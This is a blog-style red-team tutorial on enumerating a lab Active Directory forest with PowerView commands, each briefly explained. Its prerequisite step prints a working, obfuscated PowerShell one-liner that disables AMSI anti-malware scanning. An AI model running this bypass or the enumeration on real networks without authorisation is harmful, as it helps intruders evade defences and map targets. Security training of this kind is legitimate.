Red Teaming — AD Enumeration (Domain, Objects & trust)

Red teaming is a crucial aspect of cybersecurity that involves the simulation of real-world cyberattacks to identify vulnerabilities and…

Red teaming is a crucial aspect of cybersecurity that involves the simulation of real-world cyberattacks to identify vulnerabilities and weaknesses in an organization’s security posture. In this context, red teams attempt to replicate the tactics, techniques, and procedures (TTPs) of real attackers to test an organization’s defenses and uncover potential security gaps. One of the critical steps in the red teaming process is Active Directory (AD) enumeration, which involves identifying and gathering information about the organization’s AD infrastructure. AD enumeration is an essential step in identifying potential attack vectors and finding weaknesses in an organization’s security posture. This essay will explore the topic of red teaming and AD enumeration, discussing the techniques, tools, and best practices that red teams use to identify and exploit AD vulnerabilities.


AD Environment

The following going to be my test environment.

The forest root (MARVEL.local) has one dc and one computer. The child domain (ALPHA.MARVEL.local) had one dc and two computers.

MARVEL.local

  • DC — Win 2019
  • Computer — win 10

ALPHA.MARVEL.local

  • DC — Win 2016
  • Computer — win 10

We also have a few users on each domain.


Let’s start Enumerating

Prereq

Then we need to bypass AMSI using the below one-liner.

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Enumeration

  1. Get-NetDomain
Get-NetDomain

The Get-NetDomain command is a PowerShell command from the PowerView module, which is a powerful tool designed for Active Directory domain enumeration and privilege escalation. When executed, this command retrieves information about the current domain, including the domain name, domain SID, and the domain controller for the domain.

Additionally, this command provides information on the Trusts for the domain, including the trusted domain names and their respective SID values. It also displays the domain policy settings for the current domain.

Get-NetDomain –Domain MARVEL.local

The Get-NetDomain –Domain MARVEL.local command is a PowerShell command from the PowerView module, which is used to retrieve information about a specific domain in an Active Directory environment. When executed, this command retrieves information about the domain named "MARVEL.local" and returns details such as the domain name, domain SID, domain controller for the domain, and domain policy settings.

2. Get-DomainPolicy

The Get-DomainPolicy command is a PowerShell command from the PowerView module, which is designed for Active Directory domain enumeration and privilege escalation. When executed, this command retrieves information about the domain policy settings for the current domain, such as password policy, lockout policy, and Kerberos policy.

3. Get-NetDomainController

The “Get-NetDomainController” PowerView PowerShell command retrieves information about the domain controllers in the current domain.

4. Get-NetUser

The “Get-NetUser” PowerView PowerShell command retrieves information about the user accounts in the current domain.

you will always find the following accounts by default: Administrator, Guest, krbtgt

5. Get-NetComputer

The “Get-NetComputer” PowerView PowerShell command retrieves information about the computer accounts in the current domain.

6. Get-NetGroup

The “Get-NetGroup” PowerView PowerShell command retrieves information about the groups in the current domain.

7. Get-NetGroupMember

The “Get-NetGroupMember” PowerView PowerShell command retrieves the members of a specified group in the current domain.

8. Invoke-ShareFinder

The “Invoke-ShareFinder” PowerView PowerShell command searches the current domain for network shares that are accessible to the current user or the specified user account.

9. Get-NetDomainTrust

The “Get-NetDomainTrust” PowerView PowerShell command retrieves information about trusts between the current domain and other domains.

10. Get-NetForest

The “Get-NetForest” PowerView PowerShell command retrieves information about the Active Directory forest that the current domain is a part of.

11. Invoke-CheckLocalAdminAccess

The “Invoke-CheckLocalAdminAccess” PowerView PowerShell command checks if the current user or a specified user account has administrative access to the specified remote computer(s).


Conclusion

Hay Yay!!!

Please give me a clap if you found it to be useful and follow me to get more security knowledge.

In conclusion, AD enumeration is a crucial process for effectively managing and securing Active Directory environments. By conducting a thorough enumeration, organizations can identify and assess the users, groups, and resources within their AD infrastructure, enabling them to better manage access controls, monitor activity and identify potential security threats. Through the use of various enumeration techniques, such as LDAP queries and PowerShell scripts, administrators can gain visibility into their AD environment and ensure that it is properly configured and secured. However, it is important to note that enumeration should be done with caution, as it can potentially expose sensitive information if not properly secured. Overall, AD enumeration is an essential component of AD management and security and should be regularly conducted to maintain a secure and well-managed environment.